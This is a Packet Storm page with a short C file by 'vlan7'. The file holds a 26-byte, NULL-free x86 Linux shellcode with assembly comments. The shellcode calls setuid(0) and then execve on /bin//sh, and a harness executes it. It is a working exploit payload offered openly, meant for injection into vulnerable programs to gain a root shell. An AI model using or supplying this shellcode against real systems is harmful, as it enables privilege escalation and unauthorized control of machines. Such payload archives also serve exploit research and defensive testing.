26 byte (the smaller) GNU/Linux x86 setuid/execve shellcode without NULLs.
555182da9a4a0a07f261cc1b9a164f39/*
Smallest GNU/Linux x86 setuid/execve shellcode without NULLs
(based on Chema Garcia, aka sch3m4's code from opensec)
(shrinked down only for the fun of gettin' the most minimalistic shellcode possible)
vlan7 - 19/11/2008
http://vlan7.blogspot.com
Shellcode size: 26 bytes
*/
#include <stdio.h>
char sc[] =
"\x31\xc0" //xor eax,eax
"\x99" //cdq
"\xb0\x17" //mov al,17h
"\x60" //pusha
"\xcd\x80" //int 80h
"\x61" //popa
"\x52" //push edx
"\x68\x6e\x2f\x73\x68" //push 0x68732f6e
"\x68\x2f\x2f\x62\x69" //push 0x69622f2f
"\x89\xe3" //mov ebx,esp
"\xb0\x0b" //mov al,0bh
"\xcd\x80"; //int 80h
void main() {
printf("Smallest GNU/Linux x86 setuid/execve shellcode without NULLs"
"\n(based on Chema Garcia, aka sch3m4's code from opensec)"
"(only for the fun of gettin' the most minimalistic shellcode possible)"
"\n\nvlan7 - 19/11/2008"
"\nhttp://vlan7.blogspot.com"
"\n\nShellcode size: %d bytes\n", sizeof(sc)-1);
(*(void (*)()) sc)();
}
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!